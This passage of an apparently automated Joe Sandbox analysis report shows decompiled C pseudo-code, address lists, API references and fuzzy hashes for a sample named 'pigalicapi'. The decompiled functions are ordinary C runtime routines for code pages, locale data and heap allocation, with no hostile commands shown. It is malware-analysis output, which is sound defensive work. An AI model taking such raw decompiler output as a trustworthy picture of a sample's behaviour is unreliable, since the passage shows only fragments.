                                                                                                                                                                                                                                                    								__eflags =  *_t82;
                                                                                                                                                                                                                                                    								if( *_t82 != 0) {
                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t55 = _v32;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t94 = _t94 + 1;
                                                                                                                                                                                                                                                    						_t55 = _t55 + 8;
                                                                                                                                                                                                                                                    						_v32 = _t55;
                                                                                                                                                                                                                                                    						__eflags = _t94 - 4;
                                                                                                                                                                                                                                                    					} while (_t94 < 4);
                                                                                                                                                                                                                                                    					 *(_t98 + 4) = _t78;
                                                                                                                                                                                                                                                    					 *(_t98 + 8) = 1;
                                                                                                                                                                                                                                                    					 *(_t98 + 0x21c) = E00EFB10F(_t78);
                                                                                                                                                                                                                                                    					_t83 = _t98 + 0xc;
                                                                                                                                                                                                                                                    					_t91 = _v36 + 0xf8d7ec;
                                                                                                                                                                                                                                                    					_t95 = 6;
                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                    						_t58 =  *_t91;
                                                                                                                                                                                                                                                    						_t91 = _t91 + 2;
                                                                                                                                                                                                                                                    						 *_t83 = _t58;
                                                                                                                                                                                                                                                    						_t83 = _t83 + 2;
                                                                                                                                                                                                                                                    						_t95 = _t95 - 1;
                                                                                                                                                                                                                                                    						__eflags = _t95;
                                                                                                                                                                                                                                                    					} while (_t95 != 0);
                                                                                                                                                                                                                                                    					goto L36;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					E00EFB1C0(_t98);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				L39:
                                                                                                                                                                                                                                                    				return E00EFDC5F(_v8 ^ _t99);
                                                                                                                                                                                                                                                    			}






























                                                                                                                                                                                                                                                    0x00efb582
                                                                                                                                                                                                                                                    0x00efb589
                                                                                                                                                                                                                                                    0x00efb591
                                                                                                                                                                                                                                                    0x00efb599
                                                                                                                                                                                                                                                    0x00efb59e
                                                                                                                                                                                                                                                    0x00efb5af
                                                                                                                                                                                                                                                    0x00efb5af
                                                                                                                                                                                                                                                    0x00efb5b1
                                                                                                                                                                                                                                                    0x00efb5b3
                                                                                                                                                                                                                                                    0x00efb5b5
                                                                                                                                                                                                                                                    0x00efb5b8
                                                                                                                                                                                                                                                    0x00efb5b8
                                                                                                                                                                                                                                                    0x00efb5be
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb5c4
                                                                                                                                                                                                                                                    0x00efb5c5
                                                                                                                                                                                                                                                    0x00efb5c8
                                                                                                                                                                                                                                                    0x00efb5cb
                                                                                                                                                                                                                                                    0x00efb5d0
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb5d2
                                                                                                                                                                                                                                                    0x00efb5d2
                                                                                                                                                                                                                                                    0x00efb5d8
                                                                                                                                                                                                                                                    0x00efb6a6
                                                                                                                                                                                                                                                    0x00efb5de
                                                                                                                                                                                                                                                    0x00efb5de
                                                                                                                                                                                                                                                    0x00efb5e4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb5ea
                                                                                                                                                                                                                                                    0x00efb5ee
                                                                                                                                                                                                                                                    0x00efb5f4
                                                                                                                                                                                                                                                    0x00efb5f6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb5fc
                                                                                                                                                                                                                                                    0x00efb601
                                                                                                                                                                                                                                                    0x00efb607
                                                                                                                                                                                                                                                    0x00efb609
                                                                                                                                                                                                                                                    0x00efb693
                                                                                                                                                                                                                                                    0x00efb699
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb69b
                                                                                                                                                                                                                                                    0x00efb69c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb69c
                                                                                                                                                                                                                                                    0x00efb60f
                                                                                                                                                                                                                                                    0x00efb619
                                                                                                                                                                                                                                                    0x00efb61e
                                                                                                                                                                                                                                                    0x00efb626
                                                                                                                                                                                                                                                    0x00efb62c
                                                                                                                                                                                                                                                    0x00efb62d
                                                                                                                                                                                                                                                    0x00efb630
                                                                                                                                                                                                                                                    0x00efb683
                                                                                                                                                                                                                                                    0x00efb632
                                                                                                                                                                                                                                                    0x00efb632
                                                                                                                                                                                                                                                    0x00efb636
                                                                                                                                                                                                                                                    0x00efb639
                                                                                                                                                                                                                                                    0x00efb63b
                                                                                                                                                                                                                                                    0x00efb63b
                                                                                                                                                                                                                                                    0x00efb63e
                                                                                                                                                                                                                                                    0x00efb640
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb642
                                                                                                                                                                                                                                                    0x00efb645
                                                                                                                                                                                                                                                    0x00efb650
                                                                                                                                                                                                                                                    0x00efb650
                                                                                                                                                                                                                                                    0x00efb652
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb64a
                                                                                                                                                                                                                                                    0x00efb64f
                                                                                                                                                                                                                                                    0x00efb64f
                                                                                                                                                                                                                                                    0x00efb64f
                                                                                                                                                                                                                                                    0x00efb654
                                                                                                                                                                                                                                                    0x00efb657
                                                                                                                                                                                                                                                    0x00efb65a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb65a
                                                                                                                                                                                                                                                    0x00efb63b
                                                                                                                                                                                                                                                    0x00efb65c
                                                                                                                                                                                                                                                    0x00efb65c
                                                                                                                                                                                                                                                    0x00efb65f
                                                                                                                                                                                                                                                    0x00efb664
                                                                                                                                                                                                                                                    0x00efb664
                                                                                                                                                                                                                                                    0x00efb667
                                                                                                                                                                                                                                                    0x00efb668
                                                                                                                                                                                                                                                    0x00efb668
                                                                                                                                                                                                                                                    0x00efb668
                                                                                                                                                                                                                                                    0x00efb678
                                                                                                                                                                                                                                                    0x00efb67e
                                                                                                                                                                                                                                                    0x00efb67e
                                                                                                                                                                                                                                                    0x00efb688
                                                                                                                                                                                                                                                    0x00efb68b
                                                                                                                                                                                                                                                    0x00efb68c
                                                                                                                                                                                                                                                    0x00efb68d
                                                                                                                                                                                                                                                    0x00efb751
                                                                                                                                                                                                                                                    0x00efb752
                                                                                                                                                                                                                                                    0x00efb757
                                                                                                                                                                                                                                                    0x00efb758
                                                                                                                                                                                                                                                    0x00efb758
                                                                                                                                                                                                                                                    0x00efb609
                                                                                                                                                                                                                                                    0x00efb5f6
                                                                                                                                                                                                                                                    0x00efb5e4
                                                                                                                                                                                                                                                    0x00efb5d8
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb75a
                                                                                                                                                                                                                                                    0x00efb6b8
                                                                                                                                                                                                                                                    0x00efb6c0
                                                                                                                                                                                                                                                    0x00efb6c0
                                                                                                                                                                                                                                                    0x00efb6c4
                                                                                                                                                                                                                                                    0x00efb6c7
                                                                                                                                                                                                                                                    0x00efb6cd
                                                                                                                                                                                                                                                    0x00efb6d0
                                                                                                                                                                                                                                                    0x00efb6d0
                                                                                                                                                                                                                                                    0x00efb6d3
                                                                                                                                                                                                                                                    0x00efb6d5
                                                                                                                                                                                                                                                    0x00efb6d7
                                                                                                                                                                                                                                                    0x00efb6d7
                                                                                                                                                                                                                                                    0x00efb6da
                                                                                                                                                                                                                                                    0x00efb6dc
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb6de
                                                                                                                                                                                                                                                    0x00efb6e1
                                                                                                                                                                                                                                                    0x00efb6fd
                                                                                                                                                                                                                                                    0x00efb6fd
                                                                                                                                                                                                                                                    0x00efb6ff
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb6e6
                                                                                                                                                                                                                                                    0x00efb6ec
                                                                                                                                                                                                                                                    0x00efb6ee
                                                                                                                                                                                                                                                    0x00efb6f4
                                                                                                                                                                                                                                                    0x00efb6f8
                                                                                                                                                                                                                                                    0x00efb6f8
                                                                                                                                                                                                                                                    0x00efb6f9
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb6f9
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb6ec
                                                                                                                                                                                                                                                    0x00efb701
                                                                                                                                                                                                                                                    0x00efb704
                                                                                                                                                                                                                                                    0x00efb707
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb707
                                                                                                                                                                                                                                                    0x00efb709
                                                                                                                                                                                                                                                    0x00efb709
                                                                                                                                                                                                                                                    0x00efb70c
                                                                                                                                                                                                                                                    0x00efb70d
                                                                                                                                                                                                                                                    0x00efb710
                                                                                                                                                                                                                                                    0x00efb713
                                                                                                                                                                                                                                                    0x00efb713
                                                                                                                                                                                                                                                    0x00efb719
                                                                                                                                                                                                                                                    0x00efb71c
                                                                                                                                                                                                                                                    0x00efb72b
                                                                                                                                                                                                                                                    0x00efb734
                                                                                                                                                                                                                                                    0x00efb739
                                                                                                                                                                                                                                                    0x00efb73f
                                                                                                                                                                                                                                                    0x00efb740
                                                                                                                                                                                                                                                    0x00efb740
                                                                                                                                                                                                                                                    0x00efb743
                                                                                                                                                                                                                                                    0x00efb746
                                                                                                                                                                                                                                                    0x00efb749
                                                                                                                                                                                                                                                    0x00efb74c
                                                                                                                                                                                                                                                    0x00efb74c
                                                                                                                                                                                                                                                    0x00efb74c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb5a0
                                                                                                                                                                                                                                                    0x00efb5a1
                                                                                                                                                                                                                                                    0x00efb5a7
                                                                                                                                                                                                                                                    0x00efb75b
                                                                                                                                                                                                                                                    0x00efb76a

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00EFB14D: GetOEMCP.KERNEL32(00000000), ref: 00EFB178
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00EFB41B,?,00000000), ref: 00EFB5EE
                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,00EFB41B,?,?,?,00EFB41B,?,00000000), ref: 00EFB601
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 546120528-0
                                                                                                                                                                                                                                                    • Opcode ID: a1cf7ac468419e3b0b2436fd8c816ccab36438b04fc6478b2f056dc45c2bc207
                                                                                                                                                                                                                                                    • Instruction ID: 9878aafb0637ab08060637121ea0b079594164c664f670a0068ae126c3b407a4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1cf7ac468419e3b0b2436fd8c816ccab36438b04fc6478b2f056dc45c2bc207
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7515770E0420D9FDB219F31C8916FBBBE5EF81304F15616EE296EB292D7349941CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 211 efb3b9-efb3e3 call ef9c30 call efb4d8 call efb14d 218 efb3e9-efb3fe call efbd19 211->218 219 efb3e5-efb3e7 211->219 223 efb42e 218->223 224 efb400-efb416 call efb57a 218->224 220 efb43c-efb43f 219->220 225 efb430-efb43b call efa6da 223->225 228 efb41b-efb421 224->228 225->220 230 efb423-efb428 call ef9826 228->230 231 efb440-efb444 228->231 230->223 232 efb44b-efb456 231->232 233 efb446 call ef9de4 231->233 237 efb46d-efb487 232->237 238 efb458-efb462 232->238 233->232 237->225 240 efb489-efb490 237->240 238->237 239 efb464-efb46c call efa6da 238->239 239->237 240->225 241 efb492-efb4a9 call efb023 240->241 241->225 246 efb4ab-efb4b5 241->246 246->225
                                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                                    			E00EFB3B9(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                                    				char _t31;
                                                                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                                                                    				char _t40;
                                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                                    				char _t45;
                                                                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                                                                    				void* _t64;
                                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                                    				signed int _t75;
                                                                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t81 = __eflags;
                                                                                                                                                                                                                                                    				_v8 = E00EF9C30(__ebx, __ecx, __edx);
                                                                                                                                                                                                                                                    				E00EFB4D8(__ebx, __ecx, __edx);
                                                                                                                                                                                                                                                    				_t31 = E00EFB14D(_t81, _a4);
                                                                                                                                                                                                                                                    				_v16 = _t31;
                                                                                                                                                                                                                                                    				_t57 =  *(_v8 + 0x48);
                                                                                                                                                                                                                                                    				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_push(__ebx);
                                                                                                                                                                                                                                                    				_t70 = E00EFBD19(_t57, 0x220);
                                                                                                                                                                                                                                                    				_t51 = __ebx | 0xffffffff;
                                                                                                                                                                                                                                                    				__eflags = _t70;
                                                                                                                                                                                                                                                    				if(__eflags == 0) {
                                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                                    					_t75 = _t51;
                                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
                                                                                                                                                                                                                                                    					 *_t70 =  *_t70 & 0x00000000; // executed
                                                                                                                                                                                                                                                    					_t36 = E00EFB57A(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
                                                                                                                                                                                                                                                    					_t75 = _t36;
                                                                                                                                                                                                                                                    					__eflags = _t75 - _t51;
                                                                                                                                                                                                                                                    					if(_t75 != _t51) {
                                                                                                                                                                                                                                                    						__eflags = _a8;
                                                                                                                                                                                                                                                    						if(_a8 == 0) {
                                                                                                                                                                                                                                                    							E00EF9DE4();
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						asm("lock xadd [eax], ebx");
                                                                                                                                                                                                                                                    						__eflags = _t51 == 1;
                                                                                                                                                                                                                                                    						if(_t51 == 1) {
                                                                                                                                                                                                                                                    							_t45 = _v8;
                                                                                                                                                                                                                                                    							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xf8dae0;
                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(_t45 + 0x48)) != 0xf8dae0) {
                                                                                                                                                                                                                                                    								E00EFA6DA( *((intOrPtr*)(_t45 + 0x48)));
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						 *_t70 = 1;
                                                                                                                                                                                                                                                    						_t64 = _t70;
                                                                                                                                                                                                                                                    						_t70 = 0;
                                                                                                                                                                                                                                                    						 *(_v8 + 0x48) = _t64;
                                                                                                                                                                                                                                                    						_t40 = _v8;
                                                                                                                                                                                                                                                    						__eflags =  *(_t40 + 0x350) & 0x00000002;
                                                                                                                                                                                                                                                    						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                    							__eflags =  *0xf8dd04 & 0x00000001;
                                                                                                                                                                                                                                                    							if(( *0xf8dd04 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                    								_v16 =  &_v8;
                                                                                                                                                                                                                                                    								E00EFB023(5,  &_v16);
                                                                                                                                                                                                                                                    								__eflags = _a8;
                                                                                                                                                                                                                                                    								if(_a8 != 0) {
                                                                                                                                                                                                                                                    									_t44 =  *0xf8dd00; // 0x1662758
                                                                                                                                                                                                                                                    									 *0xf8d7cc = _t44;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                    						E00EFA6DA(_t70);
                                                                                                                                                                                                                                                    						return _t75;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(E00EF9826())) = 0x16;
                                                                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                                    0x00efb3b9
                                                                                                                                                                                                                                                    0x00efb3c6
                                                                                                                                                                                                                                                    0x00efb3c9
                                                                                                                                                                                                                                                    0x00efb3d1
                                                                                                                                                                                                                                                    0x00efb3da
                                                                                                                                                                                                                                                    0x00efb3dd
                                                                                                                                                                                                                                                    0x00efb3e3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb3e5
                                                                                                                                                                                                                                                    0x00efb3e9
                                                                                                                                                                                                                                                    0x00efb3f6
                                                                                                                                                                                                                                                    0x00efb3f8
                                                                                                                                                                                                                                                    0x00efb3fc
                                                                                                                                                                                                                                                    0x00efb3fe
                                                                                                                                                                                                                                                    0x00efb42e
                                                                                                                                                                                                                                                    0x00efb42e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb400
                                                                                                                                                                                                                                                    0x00efb40d
                                                                                                                                                                                                                                                    0x00efb413
                                                                                                                                                                                                                                                    0x00efb416
                                                                                                                                                                                                                                                    0x00efb41b
                                                                                                                                                                                                                                                    0x00efb41f
                                                                                                                                                                                                                                                    0x00efb421
                                                                                                                                                                                                                                                    0x00efb440
                                                                                                                                                                                                                                                    0x00efb444
                                                                                                                                                                                                                                                    0x00efb446
                                                                                                                                                                                                                                                    0x00efb446
                                                                                                                                                                                                                                                    0x00efb451
                                                                                                                                                                                                                                                    0x00efb455
                                                                                                                                                                                                                                                    0x00efb456
                                                                                                                                                                                                                                                    0x00efb458
                                                                                                                                                                                                                                                    0x00efb45b
                                                                                                                                                                                                                                                    0x00efb462
                                                                                                                                                                                                                                                    0x00efb467
                                                                                                                                                                                                                                                    0x00efb46c
                                                                                                                                                                                                                                                    0x00efb462
                                                                                                                                                                                                                                                    0x00efb46d
                                                                                                                                                                                                                                                    0x00efb473
                                                                                                                                                                                                                                                    0x00efb478
                                                                                                                                                                                                                                                    0x00efb47a
                                                                                                                                                                                                                                                    0x00efb47d
                                                                                                                                                                                                                                                    0x00efb480
                                                                                                                                                                                                                                                    0x00efb487
                                                                                                                                                                                                                                                    0x00efb489
                                                                                                                                                                                                                                                    0x00efb490
                                                                                                                                                                                                                                                    0x00efb495
                                                                                                                                                                                                                                                    0x00efb49e
                                                                                                                                                                                                                                                    0x00efb4a3
                                                                                                                                                                                                                                                    0x00efb4a9
                                                                                                                                                                                                                                                    0x00efb4ab
                                                                                                                                                                                                                                                    0x00efb4b0
                                                                                                                                                                                                                                                    0x00efb4b0
                                                                                                                                                                                                                                                    0x00efb4a9
                                                                                                                                                                                                                                                    0x00efb490
                                                                                                                                                                                                                                                    0x00efb430
                                                                                                                                                                                                                                                    0x00efb431
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb423
                                                                                                                                                                                                                                                    0x00efb428
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efb428
                                                                                                                                                                                                                                                    0x00efb421

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00EF9C30: GetLastError.KERNEL32(?,?,00EF5EB1,?,?,?,00EF4B88,?), ref: 00EF9C34
                                                                                                                                                                                                                                                      • Part of subcall function 00EF9C30: _free.LIBCMT ref: 00EF9C67
                                                                                                                                                                                                                                                      • Part of subcall function 00EF9C30: SetLastError.KERNEL32(00000000,?), ref: 00EF9CA8
                                                                                                                                                                                                                                                      • Part of subcall function 00EF9C30: _abort.LIBCMT ref: 00EF9CAE
                                                                                                                                                                                                                                                      • Part of subcall function 00EFB4D8: _abort.LIBCMT ref: 00EFB50A
                                                                                                                                                                                                                                                      • Part of subcall function 00EFB4D8: _free.LIBCMT ref: 00EFB53E
                                                                                                                                                                                                                                                      • Part of subcall function 00EFB14D: GetOEMCP.KERNEL32(00000000), ref: 00EFB178
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFB431
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFB467
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2991157371-0
                                                                                                                                                                                                                                                    • Opcode ID: a026b55241e86284d82356843aa5e1b94cfc55a4b3ab583e957adcf391631fe2
                                                                                                                                                                                                                                                    • Instruction ID: 6a708636d418a864424895f93d9c8b5affa171da5aced67d6d75dccc4abe0837
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a026b55241e86284d82356843aa5e1b94cfc55a4b3ab583e957adcf391631fe2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB31E431A0420CEFDB10EB68D541BBDB7F5EF40328F295199E614AB293EB315D40DB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 270 f01d69-f01d76 call efa67d 272 f01d7b-f01d86 270->272 273 f01d88-f01d8a 272->273 274 f01d8c-f01d94 272->274 275 f01dd4-f01de2 call efa6da 273->275 274->275 276 f01d96-f01d9a 274->276 278 f01d9c-f01dce call efa986 276->278 282 f01dd0-f01dd3 278->282 282->275
                                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                                    			E00F01D69(void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				void* __ecx;
                                                                                                                                                                                                                                                    				char _t16;
                                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                                    				char _t31;
                                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_push(_t26);
                                                                                                                                                                                                                                                    				_push(_t26);
                                                                                                                                                                                                                                                    				_t16 = E00EFA67D(_t26, 0x40, 0x30); // executed
                                                                                                                                                                                                                                                    				_t31 = _t16;
                                                                                                                                                                                                                                                    				_v12 = _t31;
                                                                                                                                                                                                                                                    				_t28 = _t30;
                                                                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                                                                    					_t2 = _t31 + 0xc00; // 0xc00
                                                                                                                                                                                                                                                    					_t17 = _t2;
                                                                                                                                                                                                                                                    					__eflags = _t31 - _t17;
                                                                                                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                                                                                                    						_t3 = _t31 + 0x20; // 0x20
                                                                                                                                                                                                                                                    						_t35 = _t3;
                                                                                                                                                                                                                                                    						_t33 = _t17;
                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                    							_t4 = _t35 - 0x20; // 0x0
                                                                                                                                                                                                                                                    							E00EFA986(_t28, _t35, __eflags, _t4, 0xfa0, 0);
                                                                                                                                                                                                                                                    							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                                                                                                                                                                                                                                                    							 *_t35 = 0;
                                                                                                                                                                                                                                                    							_t35 = _t35 + 0x30;
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                                                                                                                                                                                                                                                    							 *((char*)(_t35 - 0x24)) = 0xa;
                                                                                                                                                                                                                                                    							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                                                                                                                                                                                                                                                    							 *((char*)(_t35 - 0x22)) = 0;
                                                                                                                                                                                                                                                    							__eflags = _t35 - 0x20 - _t33;
                                                                                                                                                                                                                                                    						} while (__eflags != 0);
                                                                                                                                                                                                                                                    						_t31 = _v12;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t31 = 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				E00EFA6DA(0);
                                                                                                                                                                                                                                                    				return _t31;
                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                    0x00f01d6e
                                                                                                                                                                                                                                                    0x00f01d6f
                                                                                                                                                                                                                                                    0x00f01d76
                                                                                                                                                                                                                                                    0x00f01d7b
                                                                                                                                                                                                                                                    0x00f01d7f
                                                                                                                                                                                                                                                    0x00f01d83
                                                                                                                                                                                                                                                    0x00f01d86
                                                                                                                                                                                                                                                    0x00f01d8c
                                                                                                                                                                                                                                                    0x00f01d8c
                                                                                                                                                                                                                                                    0x00f01d92
                                                                                                                                                                                                                                                    0x00f01d94
                                                                                                                                                                                                                                                    0x00f01d97
                                                                                                                                                                                                                                                    0x00f01d97
                                                                                                                                                                                                                                                    0x00f01d9a
                                                                                                                                                                                                                                                    0x00f01d9c
                                                                                                                                                                                                                                                    0x00f01da2
                                                                                                                                                                                                                                                    0x00f01da6
                                                                                                                                                                                                                                                    0x00f01dab
                                                                                                                                                                                                                                                    0x00f01daf
                                                                                                                                                                                                                                                    0x00f01db1
                                                                                                                                                                                                                                                    0x00f01db4
                                                                                                                                                                                                                                                    0x00f01dba
                                                                                                                                                                                                                                                    0x00f01dc1
                                                                                                                                                                                                                                                    0x00f01dc5
                                                                                                                                                                                                                                                    0x00f01dc9
                                                                                                                                                                                                                                                    0x00f01dcc
                                                                                                                                                                                                                                                    0x00f01dcc
                                                                                                                                                                                                                                                    0x00f01dd0
                                                                                                                                                                                                                                                    0x00f01dd3
                                                                                                                                                                                                                                                    0x00f01d88
                                                                                                                                                                                                                                                    0x00f01d88
                                                                                                                                                                                                                                                    0x00f01d88
                                                                                                                                                                                                                                                    0x00f01dd5
                                                                                                                                                                                                                                                    0x00f01de2

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00EFA67D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EF9C5E,00000001,00000364,?,00EF4B88,?), ref: 00EFA6BE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F01DD5
                                                                                                                                                                                                                                                    Memory Dump Source
